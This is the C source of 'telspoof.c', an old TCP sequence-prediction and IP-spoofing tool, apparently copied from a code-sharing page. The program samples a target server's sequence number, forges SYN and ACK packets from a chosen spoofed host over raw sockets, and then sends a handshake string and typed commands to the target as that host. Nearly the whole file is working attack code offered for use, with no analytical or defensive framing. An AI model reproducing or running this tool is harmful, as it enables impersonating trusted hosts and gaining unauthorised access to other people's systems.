📄 telspoof.c
字号:
/* *//* tELNET SEQUENCER v0.0001 = DEVELOPED BY VECT0R-X *//* Under Solaris try: *//* gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb */#include "tcpip.c"#include <fcntl.h>#undef IP_HDRINCLunsigned long sourceport = 1036;unsigned long dest, spoofed, src, nseq, tarport, temp;char str[255], *string;char buf[4096];char spoofdir[10], *spoofid;char spoofbuf[42];int len, rec, sen, i=1, adder=128000, stringlen=0;int spooffd, spooflen;struct sockaddr_in addr, spoofedaddr;struct hostent *host;void main(int argc, char *argv[]){ unsigned long fakesequence = 408618+getpid(); sourceport+=getpid(); printf("tELNET SEQUENCE - Writtin by vect0rx.\n\n"); if (argc != 5) { fprintf(stderr,"Usage: %s <server> <port> <spoof> {1|2}\n\n",argv[0]); fprintf(stderr," <server> - Site spoof is attempted on.\n"); fprintf(stderr," <port> - Port to access on <server>.\n"); fprintf(stderr," <spoof> - Host to appear from.\n"); fprintf(stderr," 1 - Offset of 128000 (common).\n"); fprintf(stderr," 2 - Offset of 64000 (not likely).\n\n"); exit(1); } tarport = atoi(argv[2]); if (argv[4][0] == '2') adder=64000; memset(&spoofedaddr,0,sizeof(spoofedaddr)); spoofedaddr.sin_family = AF_INET; if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[3])) == -1) { if ((host = gethostbyname(argv[3])) == NULL) { printf("Unknown host %s.\n",argv[3]); exit(1); } spoofedaddr.sin_family = host->h_addrtype; memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length); } memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4); memset(&addr,0,sizeof(addr)); addr.sin_family = AF_INET; if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) { if ((host = gethostbyname(argv[1])) == NULL) { printf("Unknown host %s.\n",argv[1]); exit(1); } addr.sin_family = host->h_addrtype; memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length); } memcpy(&dest,(char *)&addr.sin_addr.s_addr,4); if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { perror("error: recv socket"); exit(1); } if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: send socket"); exit(1); } sen = openintf("sl0");#ifdef IP_HDRINCL fprintf(stderr,"IP_HDRINCL is set\n"); if (setsockopt(sen,IPPROTO_IP,IP_HDRINCL,(char *)&i,sizeof(i)) < 0) { perror("setsockopt IP_HDRINCL"); exit(1); };#endif gethostname(buf, 128); if ((host=gethostbyname(buf))==NULL) { fprintf(stderr, "Can't get my hostname!?\n"); exit(1); } memcpy(&src,host->h_addr,4); sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport, tarport, fakesequence, 0, NULL, 0); for (;;) { gettcppacket(rec,buf,sizeof(buf)); ip = (struct iphdr *) buf; if (ip->saddr != dest) continue; len = ip->ihl << 2; tcp = (struct tcphdr *) (buf+len); if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) { temp=htonl(tcp->th_seq); nseq=temp; nseq+=adder; printf("Sequence returned is %lu, Offset is %lu\n", nseq, adder); sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport, tarport, fakesequence, 0, NULL, 0); break; /* out of for loop */ } } sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport, tarport,fakesequence,0,NULL,0); printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout); usleep(10000); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport, tarport,++fakesequence,++nseq,NULL,0); printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout); usleep(5000); printf("Sending irc client handshake.\n"); fflush(stdout); strcat(spoofdir, "./telnet.d"); spooffd = open(spoofdir, O_RDONLY); if (spooffd < 0) { perror("open: "); exit(0); } else { spooflen = read(spooffd, spoofbuf, sizeof(spoofbuf)); spoofid = strtok(spoofbuf, "\r\n"); } stringlen = strlen(spoofid); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,spoofid,stringlen); fakesequence+=stringlen; for(;;) { printf("telnet:%s> ", argv[1]); fflush(stdout); string = fgets(str, 255, stdin); stringlen = strlen(string); sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport, tarport,fakesequence,nseq,string,stringlen); fakesequence+=stringlen; }}/**/⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -